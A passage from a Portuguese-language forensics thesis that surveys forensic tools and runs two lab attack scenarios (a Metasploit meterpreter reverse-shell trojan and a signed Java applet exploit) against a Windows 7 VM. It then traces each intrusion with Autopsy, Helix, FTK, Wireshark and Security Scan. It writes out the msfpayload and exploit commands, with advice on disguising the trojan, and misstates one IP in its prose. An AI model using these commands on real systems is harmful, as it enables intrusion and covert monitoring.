logs de maneira versátil e poderosa, além de fornecer um acesso universal a consulta de dados
baseados em texto e sistema de arquivo. Sua distribuição é gratuita;
GrokEVT43 – criada pela empresa Sentinel, é uma ferramenta construída para a leitura
de arquivos de log, entradas de registro e modelos de mensagens. Voltadas para sistemas
Windows™ e tem sua distribuição gratuita.
39
https://www.volatilesystems.com/default/volatility
40
http://www.windowsscope.com/index.php?option=com_content&view=article&id=119&Itemid=95
41
http://www.tzworks.net/prototype_page.php?proto_id=4
42
http://www.microsoft.com/en-us/download/details.aspx?id=24659
43
http://projects.sentinelchicken.org/grokevt/
70
3.1.7 Conjunto de Ferramentas para a Realização de uma Análise Forense
Nesta subseção será apresentado dois conjuntos de ferramentas que não se encaixam
em apenas uma única categoria como foram apresentadas as demais. Tais ferramentas são:
The Sleuth Kit44 – é uma ferramenta open source, voltada para multiplataformas.
Permite principalmente investigar as imagens do disco, analisar o volume de dados e os
sistemas de arquivos. Fornece suporte também a instalação de plug-in adicionais
possibilitando construir assim sistemas automatizados. Para facilitar seu uso, existe uma
interface gráfica, denominada por The Autopsy Forensic Browser, tal complemento pode ser
executado também em qualquer plataforma, já que é parecido com um navegador de web,
com o diferencial de que trabalha em conjunto com o The Sleuth Kit.
Helix3Pro45 – desenvolvido pela empresa E-Fense Carpe Datum, é uma ferramenta
licenciada, onde seu valor é de $239,00 ao ano. Voltada para qualquer plataforma, além de
fornecer suporte, também existem outras ferramentas que não são pagas, como por exemplo, o
Sleuth Kit. A ferramenta faz imagens de todos os dispositivos internos, faz imagem de
memória (sendo tanto de 32 e 64 bits), faz uma imagem de todos os dispositivos e pesquisa
por tipos específicos de arquivos, por exemplo, arquivos gráficos e documentos.
Será apresentado a seguir na Tabela 2, o conjunto de todas as ferramentas apresentadas

nesta seção.
Nome da Ferramenta Fabricante S.O. Custo Objetivo
Recuperar dados do HD
Data Compass SalvationDATA Multi Plataforma $1.500,00
danificados fisicamente.
DeepSpar Data Recupera dados e
Forense Add-On for
Recovery Multi Plataforma S/V fornece suporte a
DeepSpar Disk Imager
Systems relatórios de perícia.
Recupera dados ditos
PSIClone CPR Tools Multi Plataforma $1.999,00
como irrecuperáveis.
Guymager S/A GNU/Linux Código Aberto Gera imagens de mídia.
Steve Gibson e Verifica a imagem entre
AIR GNU/Linux Código Aberto
Bassetti Nanni fonte e cópia.
ProDiscover Forense S/A Windows S/V Captura informações do
44
http://www.sleuthkit.org/sleuthkit/desc.php
45
http://www.e-fense.com/helix3pro.php
71
disco.
Conjunto de ferramentas
Paraben
P2 Commander Windows S/V que auxilia em uma
Corporation
perícia.
AccessData Fornece suporte para
FTK Digital Forensics Windows $12.500,00 agregar novas
Software ferramentas.
Stellar Phoenix NTFS Stellar Data Recupera dados de
Windows S/V
Data Recovery Recovery arquivos perdidos.
EASEUS Recovery Recupera partições
EaseUS Multi Plataforma Ferramenta Livre
Software perdidas ou danificadas.
Data Recovery Recupera dados de
CnW Recovery Windows $189,90
Software discos corrompidos.
Gera previews dos
FreeRecover S/A Multi Plataforma Ferramenta Livre
arquivos apagados.
Recuperação de
Scalpel S/A Multi Plataforma Ferramenta Livre
arquivos.
Software Compara e analisa os
Analysis and dados a fim de encontrar
Code Suite Multi Plataforma Ferramenta Livre
Forensic violações de direitos
Engineering autorais.
SurfRecon Ferramenta que busca
Pornography-Detection SurfRecon Multi Plataforma S/V por conteúdo
Software pornográfico.
Agência Nacional Automatiza o processo
The Open Computer
da Polícia Multi Plataforma S/V forense em ambiente
Forensics Architeture
Holandesa digital.
Analisa o
Architecture
compartilhamento de
P2P Marshal Technology Multi Plataforma S/V
arquivos de software em
Corporation
um disco.
Realiza a leitura, escrita
ou edição de
ExifTool Phil Harvey Multi Plataforma Licença Gratuita
informações em
metadados.
Ferramenta que busca
Metadata Extraction National Library
Multi Plataforma Licença Gratuita extrair automaticamente
Tool of New Zealand
metadados.
Analisa arquivos de
ExifTags S/A Multi Plataforma Ferramenta Livre
imagem.
A ferramenta permite
Directory Lister Pro KRKsoft Windows $29,00 lista arquivos de
diretórios selecionados.
Ferramenta para extrair
The Volatility
Volatile Systems Multi Plataforma Código Aberto artefatos de memória
Framework
volátil.
WindowsSCOPE
Realiza engenharia
WindowsSCOPE Forensics &
Windows $4.999,00 reversa em um sistema
CaptureGuard Cyber Security
Windows.
Tools
Window Event Log Ferramenta que analisa
TZWorks LLC Windows Licença Gratuita
Viewer log.
Ferramenta que analisa
Log Parser 2.2 Microsoft Windows Licença Gratuita
log.
Ferramenta que faz
GrokEVT Sentinel Windows Licença Gratuita leitura de arquivos de
log.
The Sleuth Kit S/A Multi Plataforma Código Aberto Investiga imagens do
72
disco, analisa o volume

de dados e os sistemas
de arquivos.
E-Fense Carpe Faz a imagem de todos
Helix3Pro Multi Plataforma $239,00
Datum os dispositivos internos.
Tabela 2 - Ferramentas para Análise Forense.
Fonte: Autor.
Após a apresentação dos tipos de ataques e a ferramentas de análise forense, a seguir

será apresentada a estrutura utilizada no desenvolvimento do trabalho e a criação dos cenários
necessários para efetuar os ataques realizados no estudo de caso.
3.2 ESTRUTURA UTILIZADA PARA O DESENVOLVIMENTO DOS CENÁRIOS
Para a realização do projeto, foi utilizada a estrutura descrita nas subseções abaixo.
3.2.1 Hardware
Será utilizado um notebook da marca ACER™, cujo seu modelo é Aspire 2920 e sua
configuração está descrita abaixo:
• Processador: Intel Core 2 Duo, com 2 GHz, 667 MHz FSB, 2 MB L2 cache;
• Memória RAM: 2 GB DDR 2;
• HD: 500 GB.
3.2.2 Software
Para a prática do trabalho, foi preciso particionar o HD, onde ficou dedicado cerca de
150 GB de memória para a instalação de uma distribuição Linux, denominada por Kali Linux
na versão 1.0.2. Tal distribuição contém algumas ferramentas pré-instaladas para a realização
de Testes de Penetração, popularmente conhecidos por Pen Test. Essas ferramentas podem ser
instaladas em outras distribuições, porém, a facilidade de encontra-las nesta distribuição do
73
Linux foi o que motivou a escolha, já que o foco principal não era os ataques, mas a análise
no desempenho das ferramentas ao ter sido realizado uma invasão.
Após o particionamento e a instalação do sistema operacional Kali Linux, foi instalado
um programa que recebe o nome de VirtualBox cuja sua versão é a 4.2.12, tal software é um
virtualizador que permite a instalação e a execução de um ou mais sistemas operacionais, que
recebem o nome de sistemas convidados, dentro do sistema operacional instalado diretamente
no hardware, que recebe o nome de hospedeiro. Neste trabalho, o sistema convidado será o
Windows™ 7 e servirá de alvo dos ataques que executará sobre o sistema hospedeiro, Kali
Linux, de onde serão realizados os ataques.
3.2.3 Configuração
As configurações necessárias para a realização do projeto foram:
• Instalação do Kali Linux:
Para a instalação do sistema operacional Kali Linux, não foi feito nenhuma alteração,
sendo assim todos os passos foram realizados da maneira padrão sugeridos pelo processo de
instalação.
• Configuração do software para virtualização o sistema operacional Windows™

7:
Para a instalação do sistema operacional Windows™7 foram realizadas as seguintes

configurações:
• 800 MB de memória RAM;
• Criou-se um HD virtualizado de 50 GB;
• Para a instalação do sistema operacional Windows™7, versão Home
Premium, foi realizado uma configuração padrão, na plataforma de 32
bits.
74
Após as primeiras configurações, o firewall da máquina foi deixado configurado de

maneira padrão, sem nenhum tipo de alteração. Foi instalado apenas um antivírus de
distribuição livre, Avast! Free Antivírus 8.0.1483.
• Configuração da rede para a realização dos ataques:
Para a configuração da rede, foi preciso deixar o sistema Windows™7, que está sendo
virtualizado na máquina virtual, com duas placas de redes em modo Bridge e com a opção de
cabo conectado ativa. Além de um roteador fornecendo DHCP na faixa de rede especificada
abaixo, e a placa estar em modo Bridge, o IP é capturado.
As configurações de redes ficaram da seguinte maneira:
• (Alvo): 192.168.0.102
• (Atacante): 192.168.0.101
• (Máscara de Rede): 255.255.255.0
• (Gateway Padrão): 192.168.0.1
3.2.4 Justificativa
Para a realização do trabalho foram escolhidas as ferramentas de análise forense de

licença de código aberto e algumas ferramentas proprietárias. Porém, somente aquelas em que
o fabricante disponibiliza uma versão desatualizada gratuita46 ou para ser testadas por trinta
dias, já que os custos para aquisição de uma ferramenta licenciada é de um custo elevado. As
ferramentas selecionadas foram:
• Autopsy (The Sleuth Kit) = versão 3.0.5, lançada em 26 de março de 2013;

• Helix = um live cd disponibilizado para download47, versão R1, lançada em
2009;
• Wireshark = programa que analisa pacotes trafegados na rede;
46
Versão desatualizada da ferramenta, cuja última atualização passou a ser licenciada.
47
http://www.e-fense.com/products.ph
75
• FTK – Forensic Toolkit = software de varredura de disco rígido;

• Security Scan48 = ferramenta que realiza uma varredura por toda a máquina
atrás de vulnerabilidades, fornecida pela empresa Kaspersky.
Já para os ataques o sistema operacional Kali Linux, além de ser uma distribuição
GNU/Linux, de código aberto, abrange uma grande quantia de softwares para ataque.
A seguir será realizada uma análise experimental utilizando cenários controlados a fim
de comparar as ferramentas.
3.3 CENÁRIO 01
A seguir na Tabela 3, será apresentada uma prévia do que foi utilizado para a criação
deste cenário.
Técnica/Ferramenta
Objetivo Conclusão
Utilizada
Ataque utilizando Invadir a máquina para realizar um
Foi realizada a invasão com sucesso.
um trojan monitoramento.
Não foi possível sua utilização, já que a
Utilizar para encontrar vestígios de
Ferramenta Autopsy captura de informações não apresentou
que o computador foi invadido.
resultados.
Ao utilizar esta ferramenta foi possível
Utilizar para encontrar vestígios de comprovar de que existia a comunicação
Live CD do Helix
que o computador foi invadido. entre as duas máquinas. Além trazer outras
informações referentes ao computador.
Analisador de Utilizando esta ferramenta foi possível
protocolos comprovar de que existia a comunicação
Wireshark entre as duas máquinas.
Ao se utilizar tal ferramenta foi possível
Security Scan descobrir qual o mecanismo utilizado pelo
atacante para a realização da invasão.
Tabela 3 - Resumo do cenário 01.
Fonte: Autor.
48
http://usa.kaspersky.com/downloads/free-anti-virus-scan
76
Para a criação deste cenário, o ataque a ser utilizado é o Espia, que vem como um
plug-in da ferramenta Metasploit Framework, e tem como foco o monitoramento da máquina
alvo.
Após a realização da comunicação entre os dois sistemas operacionais, foi realizado a
criação de um arquivo executável que pudesse servir como um mecanismo de entrada no
computador alvo. Este mecanismo também é conhecido por trojan.
No computador atacante foi aberto o console do Metasploit, como mostra a Figura 9:
Figura 9 – Abrindo o console do Metasploit.

Fonte: Autor.
Com o console aberto, foram fornecidos os seguintes comandos:
1 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 X

> /tmp/desktop.exe
Tabela 4 - Envenenamento do arquivo executável.
Fonte: Autor.
É possível visualizar na Tabela 4, o comando msfpayload injetando meterpreter

(prompt de comando do metasploit) dentro do arquivo executável desktop.exe, através do
comando X > /tmp/desktop.exe. Além de direcionar o retorno do ataque para o IP
192.168.0.102 (através do comando LHOST=192.168.0.102), usando a porta 4444
(LPORT=4444).
77
Após a realização destes passos, basta mascarar o arquivo executável em alguma foto,
vídeo ou arquivo compactado e enviá-lo para o usuário alvo do ataque. Nesse caso, ele não foi
ocultado, simplesmente copiado da máquina atacante para o alvo através de um pen drive.
Com o arquivo executável no computador alvo, basta o usuário executar o arquivo
para disparar a ação, e o prompt de comando na máquina de ataque estará pronto para tomar
posse, este conceito é conhecido como backdoor.
Na Tabela 5, foram fornecidos os seguintes comandos para tomar o controle do alvo:
1 ps
2 migrate 1336
Tabela 5 - Tomada de posse do computador alvo.
Fonte: Autor.
Na Tabela 5, a linha 1 após a invasão da máquina alvo, é fornecido o comando ps para

listar os processos ativos no computador, com a escolha feita, na linha 2, o comando migrate
irá migrar para o processo escolhido, que nesse caso foi o 1336, que corresponde ao
explorer.exe, foi selecionado porque é um dos últimos processos a serem finalizados na
máquina, independente do sistema operacional.
Na Figura 10, é possível visualizar o comando Espia sendo executado, onde habilita
módulos de monitoramento, que neste caso será utilizado o screenshot que realiza uma
captura da tela alvo com o complemento de onde será salva a imagem gerada, e em seguida o
retorno do resultado desta captura.
78
Figura 10 – Comando Espia mais o resultado retornado após sua execução.

Fonte: Autor.
Para que fosse dado início à investigação, foi escolhida a ferramenta Autopsy. Tal
ferramenta foi instalada diretamente na máquina alvo antes de qualquer ataque realizado.
Ao abrir o programa é preciso fornecer uma imagem do HD que atenda as
especificações mostradas na Figura 11.
Figura 11 – Programa Autopsy.

Fonte: Autor.
79
Como não é possível criar uma imagem do HD dentro do próprio sistema operacional
do Windows™ 7, foi utilizado um live cd do Linux Ubuntu, versão 12.04.2 para desktop, de
plataforma de 32 bits.
O sistema virtualizado foi reinicializado para que pudesse realizar o boot, através do
live cd do Linux, e a partir do momento em que entrou em execução, foram executados os
comandos apresentados na Figura 12.
Figura 12 – Linhas de códigos para a criação da imagem do HD.

Fonte: Autor.
Como é possível visualizar na Figura 12, esses foram os comandos necessários para a
criação da imagem do HD, do qual foi exportada para um HD externo conectado a porta USB,
abaixo segue a explicação das linhas de comando, como mostra a Tabela 6:
1 cat /proc/partitions
2 mkdir /mnt/hd
3 mount /dev/sdxx /mnt/hd
4 dd if=/dev/sdxx of=/mount/hd/(nome da imagem).img
Tabela 6 - Criação de uma imagem do HD.
Fonte: Autor.
Na Tabela 6, o primeiro comando (linha 1) lista as partições do HD, na linha 2 monta

a unidade de destino e cria a pasta que será o ponto de montagem, na linha 3 monta a unidade
de destino e na linha 4 cria a imagem do disco e grava na unidade montada.
Após a execução dos comandos, a criação da imagem do HD levou aproximadamente
8 horas, mas, após seu término estava pronta para ser executada dentro do programa Autopsy.
80
Porém, o uso desta técnica traz alguns problemas, como por exemplo, a perda das conexões
feitas, como este ataque é um monitoramento remoto, ao fechar a conexão perde-se toda a
informação. Desta forma é possível visualizar a importância de um planejamento e cuidados
no momento da coleta das informações, onde as técnicas e metodologias utilizadas por peritos
foram descritos no capítulo 2.
A segunda ferramenta utilizada foi um live cd contendo uma versão do Helix. Para sua
utilização não é preciso reiniciar a máquina, basta executá-lo dentro dela.
Ao dar início em sua utilização, o Helix traz as informações do sistema operacional em
que está sendo executando, que neste caso é o Windows™ 7, como ilustra a Figura 13.
Figura 13 – Informações do sistema operacional no software.

Fonte: Autor.
Na Figura 13, é possível visualizar alguns dos dispositivos de armazenamento que

estão disponíveis dentro do sistema operacional do Windows™ 7, como por exemplo, o HD
(que está localizado no C:), o live cd do Helix (localizado no D:) e um pen drive (localizado
no F:). Mostra também o número de IP da máquina, o nome do usuário, dentre outras
informações.
Na Figura 14, são listados os processos que estão executando na máquina.
Ao listar todos os processos, é possível notar que existe um processo que está
executando a partir da área de trabalho do usuário, com o nome de desktop.exe, tal informação
já pode ser um indicativo de que o computador possui um processo suspeito.
81
Figura 14 – Processos que estão sendo executados na máquina alvo.

Fonte: Autor.
Para existir a confirmação do ataque, o live cd disponibiliza um prompt de comando

nativo, assim assegurando que este não tenha sido alterado por um possível invasor. Na
Figura 15 é mostrado o comando.
Figura 15 – Processos que estão sendo executados na máquina alvo.

Fonte: Autor.
O comando netstat lista todas as conexões ativas, apontando tanto o endereço de IP

local, quanto o endereço externo (algum serviço ou solicitação requisitada), e mostra o estado
desta transição, ou seja, se está ativa (Established) ou inativa (Close Wait). Nota-se que existe
uma comunicação com um endereço externo, que não aponta para nenhum tipo de protocolo
vinculado ao uso da Internet, como por exemplo, o HTTP.
Com essa informação em mãos, torna-se ainda mais evidente que o computador possa
ter sido invadido, para visualizar os dados que vem sendo trafegados no meio externo, foi
realizado um dump de rede, apresentado na Figura 16. Tal processo vai esclarecer do que se
82
trata a conexão entre o endereço local e o endereço externo encontrado durante a execução do
comando netstat.
Figura 16 – Comando para realizar o dump de rede.

Fonte: Autor.
Na Figura 16 é possível visualizar o comando para realizar o dump de rede, onde o

total de pacotes capturados foi de 6.886. A seguir, na Figura 17, é apresentado o analisador de
protocolos (Wireshark) abrindo este arquivo contendo o dump, e a partir do momento em que
as duas máquinas começam a se comunicar.
Figura 17 – Abertura do dump com o software Wireshark.

Fonte: Autor.
Na Figura 17, é possível visualizar que a partir do pacote 186 (na primeira coluna, No)
o endereço 192.168.0.102 (terceira coluna, Source) faz uma requisição para o endereço
192.168.0.101 (quarta coluna, Destination) utilizando o protocolo TCP (quinta coluna,
Protocol). Desde modo, é possível identificar que foi iniciada uma conexão entre os dois
83
endereços (na ultima coluna, o termo [SYN] representa um pacote com a flag de
sincronização, provando que existe uma conexão sendo iniciada).
Ainda na Figura 17, a segunda linha mostra que o endereço 192.168.0.101, além de
também realizar uma conexão com o endereço 192.168.0.102, reconhece os pacotes recebidos
na primeira tentativa de conexão (o termo [ACK] indica flag acknowlodge do protocolo TCP,
que indica o endereço reconhecendo os dados recebidos).
A Figura 18 mostra a tentativa de descriptografar os dados que estão sendo trafegados

entre os dois endereços apresentados na figura anterior.
Figura 18 – Descriptografando o tráfego entre os dois endereços identificados.

Fonte: Autor.
Nota-se na Figura 18, que toda a informação gerada não traz nenhum resultado legível,
ou seja, que fosse de fácil leitura. Tal fato é resultado do padrão dos protocolos TCP/IP.
A utilização destas duas ferramentas comprovou que existe a comunicação entre o
computador invasor com o alvo. Foi utilizada uma ferramenta para realizar uma varredura no
sistema em busca de vulnerabilidades, este software é fornecido pela empresa Kaspersky, e
recebe o nome de Security Scan, gratuito, apesar de ser proprietário.
84
Tal ferramenta fornece a opção de duas maneiras para fazer a varredura, uma mais
simples (verificação rápida) e uma que varre de maneira mais completa o computador
(verificação completa). Na Figura 19, é possível visualizar a interface do programa.
Figura 19 – Interface do Security Scan.

Fonte: Autor.
Ao iniciar a varredura, o software Security Scan faz uma busca por vírus, trojans,
vulnerabilidades, verifica o antivírus de maneira automática entre outras funcionalidades.
Enquanto o processo é executado, a ferramenta já vai retornando se existe algum problema na
máquina e, caso encontre, o alerta aparece destacado no canto inferior direito, ao lado da lupa
de verificação completa.
Na Figura 20 é possível visualizar que na verificação rápida realizada no sistema alvo
do ataque, o Windows™ 7, a ferramenta encontrou 15 problemas no total. Se for acionada a
opção de “clique aqui para obter uma solução”, será direcionado para uma página HTML, que
ao ser aberta em um navegador, apresenta um relatório completo e bastante específico,
separado por critérios de varredura que a ferramenta utiliza.
85
Figura 20 – Interface apresentado os resultados de forma genérica.

Fonte: Autor.
Na Figura 21, ao analisar os resultados retornados na ferramenta, é possível visualizar

nas linhas um, dois e três que existe um arquivo executável infectado por um trojan, cujo
nome é HEUR:Backdoor.Win32.Generic. O local de armazenamento do backdoor está em
três lugares diferentes: pasta Temp, onde está recebendo o nome de XPzZQCLw.exe (é o
trojan); o outro também na pasta Temp com o nome de dyUKmIHC.exe (o backdoor); e o
terceiro na área de trabalho do usuário (desktop), que está com o nome de desktop.exe (é o
arquivo original que foi infectado).
Utilizando essas três ferramentas foi possível cobrir por inteiro a investigação,
mostrando que existe uma comunicação entre as duas máquinas e que existe um processo
sendo executado na máquina alvo, o qual foi instalado por um trojan contendo um backdoor.
Deste modo, é possível provar que a máquina foi invadida e que, portanto, não pode ser mais
considerada segura.
86
Figura 21 – Resultados retornados no formato HTML.

Fonte: Autor.
3.4 CENÁRIO 02
A seguir na Tabela 7, será apresentada uma prévia do que foi utilizado para a criação
deste cenário.
Técnica/Ferramenta
Objetivo Conclusão
Utilizada
Ataque explorando
Invadir a máquina para realizar
uma vulnerabilidade Foi realizada a invasão com sucesso
alterações dentro do sistema
do plug-in Java
Utilizar para encontrar vestígios de Conseguiu trazer os arquivos deixados durante a
Ferramenta Autopsy
que o computador foi invadido invasão.
Utilizar para encontrar vestígios de Não foi possível sua utilização, já que a captura
Live CD do HeliX
que o computador foi invadido de informações não apresentou resultados.
Utilizar para encontrar vestígios de Conseguiu trazer os arquivos deixados durante a
Forensic Toolkit(FTK)
que o computador foi invadido invasão.
Ao se utilizar tal ferramenta foi possível
Security Scan descobrir qual o mecanismo utilizado pelo
que o computador foi invadido
atacante para a realização da invasão.
Tabela 7 - Resumo do cenário 02.
Fonte: Autor.
Na criação deste cenário será usada uma técnica que explora a vulnerabilidade no
plug-in Java. Esta vulnerabilidade consiste em utilizar uma assinatura, onde é preciso que a
87
vítima ao acessar determinado site, aceite um aplicativo Java, assim dando acesso a sua
máquina ao possível invasor.
Na Tabela 8 é possível visualizar todos os comandos que o invasor precisou realizar
dentro do prompt de comando do Kali Linux para a execução do ataque.
1 search java_signed
2 use multi/browser/java_applet
3 set APPLETNAME InvasaoPorSite
4 set SRVPORT 80
5 set URIPATH /invasaoporsite
6 set LHOST 192.168.0.101
7 exploit
Tabela 8 - Comandos realizados para a invasão utilizando o java.

Fonte: Autor.
O comando descrito na primeira linha da Tabela 8, é a procura do java_signed dentro

do banco de exploit do Kali Linux. Na segunda linha, o comando está sendo utilizando é o
/browser/java_applet para a invasão. Na terceira linha é criado uma APPLETNAME com o
nome de InvasaoPorSite que será o nome da página utilizada para o ataque. A quarta linha
apresenta a porta de comunicação utilizada para o retorno da resposta, que nesse caso foi a
porta TCP 80. O comando descrito na quinta linha cria o complemento da extensão utilizada
para o acesso da página localizada na URL. Na sexta linha é colocado o número de endereço
IP da máquina atacante, enquanto na sétima linha é fornecido comando exploit para que a
máquina atacante fique aguardando até que o alvo acesse seu site, para que a partir desse
momento realize a invasão. Na Figura 22 é possível visualizar o momento em que o alvo faz a
requisição e aceita o aplicativo, assim deixando que o invasor comece a controlar sua
máquina.
88
Figura 22 – Espera da requisição e aceite do aplicativo Java.

Fonte: Autor.
Na Figura 22 além de mostrar as requisições e o aceite do aplicativo, é possível

visualizar na última linha que foi criada uma comunicação entre o computador alvo e o
atacante.
Para concretizar o ataque, é preciso migrar para o processo escolhido que vem sendo
executada na máquina alvo, a técnica utilizada é a mesma do cenário 01.
A partir do momento em que foi feita a migração para o processo, a técnica utilizada
foi abrir o prompt de comando da máquina alvo, assim conseguindo um maior privilégio para
alterações no sistema, diferente do cenário 01, onde era realizado apenas um monitoramento
das atividades da vítima. Na Figura 23, é possível visualizar o comando para ter o acesso a
este prompt de comando.
Figura 23 – Acesso ao prompt de comando da máquina alvo.

Fonte: Autor.
Realizado tal processo, basta acessar a pasta de usuário público e criar uma pasta de
diretório na máquina alvo, assim podendo enviar vírus, trojans, rootkit, entre outros processos
que o invasor preferir. Neste cenário foram gravados e editados dois arquivos dentro da
89
máquina alvo, na Figura 24 é apresentado um dos arquivos. Após realizados todos os teste, e
possuindo o ataque bem sucedido, foi feito uma análise pericial.
Figura 24 – Criação e edição do arquivo de texto na máquina alvo.

Fonte: Autor.
As ferramentas utilizadas foram: Autopsy, o live cd do Helix, uma ferramenta que o

live cd disponibiliza chamada de Forensic Toolkit (FTK) e o Security Scan.
A técnica utilizada para este cenário foi a aquisição do HD, a primeira ferramenta
escolhida foi o Helix, na Figura 25 é possível visualizar o processo da aquisição da mídia.
Figura 25 – Aquisição da mídia.

Fonte: Autor.
A Figura 25 apresenta o processo de criação da mídia. A primeira opção que o

programa oferece é de qual mídia se deseja adquirir uma cópia, depois fornece a oportunidade
de escolher o destino para salvar as informações, que neste caso foi utilizado um HD externo
conectado a máquina alvo, e por último fornece a opção de escolher o nome da imagem
criada.
90
Porém, existiu algum problema desconhecido que impossibilitou a criação da imagem,

então foi utilizada a ferramenta FTK que o próprio live cd disponibiliza. Na Figura 26, é
possível visualizar o processo da nova aquisição de mídia.
Figura 26 – Aquisição da nova mídia utilizando o FTK.

Fonte: Autor.
A Figura 26 mostra ainda as opções de qual tipo de evidência que o perito quer
manipular, a escolhida foi a Physical Drive (ou Drive Físico), escolhendo esta opção, o
investigador opta por realizar uma cópia do HD alvo bit a bit, ou seja, todas as informações
são salvas, mesmo o espaço que não contém nenhuma informação armazenada.
Na Figura 27 é apresentado qual foi o HD escolhido seguido por qual extensão que o
arquivo vai receber ao ser criado pela ferramenta.
Figura 27 – HD escolhido juntamente com a extensão do arquivo.

Fonte: Autor.
91
Após escolhidas e preenchidas as opções que a ferramenta disponibiliza, basta esperar

para que a criação da imagem seja realizada. Foi criada outra imagem utilizando as mesmas
técnicas apresentadas no cenário 01, para que pudesse ser utilizado na ferramenta Autopsy.
Para começar a análise, a ferramenta escolhida foi o Autopsy. Ao iniciar a ferramenta,
é possível escolher três opções, que são: Criar um novo caso, Abrir um caso existente ou
Abrir um caso recente. Como será feito a primeira análise a opção escolhida foi a de criar
novo caso. Em seguida na Figura 28, o programa dispõe da possibilidade de o investigador
escolher o tipo de entrada que deseja (neste cenário foi utilizado à opção Image File, que
fornece suporte para as mídias criadas utilizando as técnicas já tratadas), além de fornecer a
opção de inserir um caminho da imagem do HD criado.
Figura 28 – Opções para a entrada desejada, seguido do caminho até o arquivo gerado.
Fonte: Autor.
Assim que o programa carregar o arquivo, é possível começar a realizar uma análise
das informações adquiridas.
Na Figura 29, mostra as opções separadas por seções que a ferramenta disponibiliza,
como por exemplo, os históricos de navegação na Internet, os chamados cookies, arquivos
recentes, os tipos de arquivos, o HD com todas as pastas e subpastas, dentre outras opções. Ao
clicar na aba de históricos da Internet, é possível visualizar que a vítima acessou um site cuja
URL termina com /invasaoporsite, tal processo aponta que existiu a requisição para este
domínio.
92
Figura 29 – Aba contendo os históricos de navegabilidade na Internet.

Fonte: Autor.
Na Figura 30, foi escolhido na aba Views a opção Recent Files, que traz os arquivos
recentes, separados por ordem cronológica. Dentre todos os dias, a opção escolhida foi a
Final Day, após examinado os itens apresentados neste dia, foi encontrado o arquivo excluído
durante o ataque, porém este não foi apresentado com o nome que tinha sido criado, e sim
com outro nome ($R09P1Z8.txt), entretanto ao selecioná-lo é possível visualizar o conteúdo
contido neste arquivo. E ao selecionar a opção de cima ($I09P1Z8.txt), o software traz o
caminho de armazenamento deste arquivo, que nesse caso foi:
C:\Users\Public\Teste\ArquivoQueSerahApagado.txt.
93
Figura 30 – Encontrando o arquivo excluído.

Fonte: Autor.
A segunda ferramenta utilizada nessa análise foi o Forensic Toolkit (FTK). Na Figura
31, é possível visualizar a tela onde deve ser escolhido o tipo de ação que será tomado, nessa
ocasião foi optada pela Image File, que fornece oportunidade de abrir uma imagem criada do
HD da vítima, em seguida foi passado o caminho de onde o arquivo está armazenado (o
arquivo da imagem foi guardado no HD externo, cujo caminho apontado ficou:
F:\Evidencias_Helix\evidencias.001).
Figura 31 – Abrindo o arquivo da imagem criada do HD.

Fonte: Autor.
94
A Figura 32 mostra do lado esquerdo todas as abas que o investigador tem disponível
para análise, como já tinha sido identificada a pasta onde estavam contidos os arquivos de
texto através da ferramenta Autopsy, foi preciso apenas encontrá-la dentro do FTK e entrar
para visualizar o que esta continha. No lado direito, é apresentado o nome dos arquivos de
texto que continuam armazenados no computador da vítima, o tamanho que cada arquivo
possuí, juntamente do dia de sua última modificação e do conteúdo existente em cada um.
Figura 32 – Tela de navegação da ferramenta e informações da pasta Teste.

Fonte: Autor.
Uma diferença encontrada na ferramenta FTK em relação ao Autopsy, é que o FTK

não apresenta o conteúdo do arquivo excluído, apenas o caminho e o nome que o arquivo
possuía anteriormente, o tamanho, o tipo de arquivo e a data de modificação. Do lado
esquerdo a disposição das pastas também é um pouco diferente em relação à ferramenta
Autopsy. É possível visualizar inclusive os dispositivos USB conectados que tenham sido
conectados no computador alvo. Na Figura 33 é apresentada a disposição do conteúdo na tela.
95
Figura 33 – Tela com a disposição do conteúdo da ferramenta.

Fonte: Autor.
A terceira ferramenta utilizada para este cenário foi o Security Scan da empresa
Kaspersky, o mesmo software visto no cenário 01. Para dar início ao seu uso, foram tomados
os mesmo procedimentos e selecionado o mecanismo de verificação rápida. Porém, a resposta
retornada não agregou nenhum valor para a investigação, ou seja, que comprovasse a
existência de provas de que o computador tinha sido invadido e qual ataque teria sido
utilizado.
Para resolver tal problema, foi realizada então, uma verificação completa no
computador da vítima, fazendo essa busca obteve maiores informações de tudo que ocorrerá
dentro do sistema. Na Figura 34, é possível visualizar que retornou quarenta tipos diferentes
de vulnerabilidades na máquina alvo.
Figura 34 – Nova busca com Security Scan.

Fonte: Autor.
96
Na Figura 35, é possível visualizar o relatório mais completo que o apresentado no

cenário 01. Nota-se que ele retorna em três linhas (17,18 e 20) o tipo de vulnerabilidade
atacada na máquina do usuário e qual a assinatura deixada pela invasão. O nome dessa
assinatura é dada por Exploit.Java.CVE-2012-4681.I, mostra também o caminho onde está
armazenado a vulnerabilidade explorada e o nome do arquivo.
Ao utilizar as três ferramentas, foi comprovado que existiu uma invasão no
computador alvo, já que apresenta além das comunicações entre as máquinas, técnica
mostrada no cenário 01, a criação/edição/exclusão de arquivos e qual o mecanismo utilizado
para este ataque. Constatando que o sistema não é mais confiável.
Figura 35 – Resultados retornados.

Fonte: Autor.
Para a recuperação do arquivo que foi excluído durante a invasão, foi utilizado três
ferramentas, EaseUS Partition Recorey, FreeRecover e Data Recovery.
A primeira ferramenta utilizada foi a EaseUS Partition Recorey, assim que aberta a
janela para fazer a restauração do arquivo, o software fornece algumas opções como é
possível visualizar na Figura 36:
97
Figura 36 – Software EaseUS Partition Recovery.

Fonte: Autor.
Como é possível ver na Figura 36, o programa oferece para o usuário algumas opções
para fazer a recuperação de dados perdidos, foi escolhida a primeira alternativa, Search Entire
Disk, que possibilita a busca por todo o disco. Também existem as opções para procurar por
espaços alocados no HD e por setor específico. Após realizado a escolha entre esses três tipos,
o software ainda disponibiliza dois mecanismos de busca, um rápido e o outro completo, para
este cenário o escolhido foi por uma busca completa. Na Figura 37, é possível visualizar os
resultados retornados.
Figura 37 – Resultados retornados pelo EaseUS Partition Recovery.

Fonte: Autor.
98
A segunda ferramenta utilizada para tentar recuperar os arquivos foi o FreeRecover,

na Figura 38 é possível visualizar os resultados retornados pela ferramenta.
Figura 38 – Resultados retornados pelo FreeRecover.

Fonte: Autor.
Como é possível visualizar na Figura 38, a ferramenta disponibiliza como umas das
opções para o usuário escolher o driver de onde serão recuperados os dados, depois a baixo,
lista todos os dados retornados, além de disponibilizar uma pesquisa avançada utilizando o
recurso Search String, e ao clicar em qualquer informação das que foram retornadas, o
programa exibe seu conteúdo em detalhes logo em baixo da pesquisa, se for o arquivo
desejado, basta clicar em Recover Files para que sejam trazidos os dados de volta.
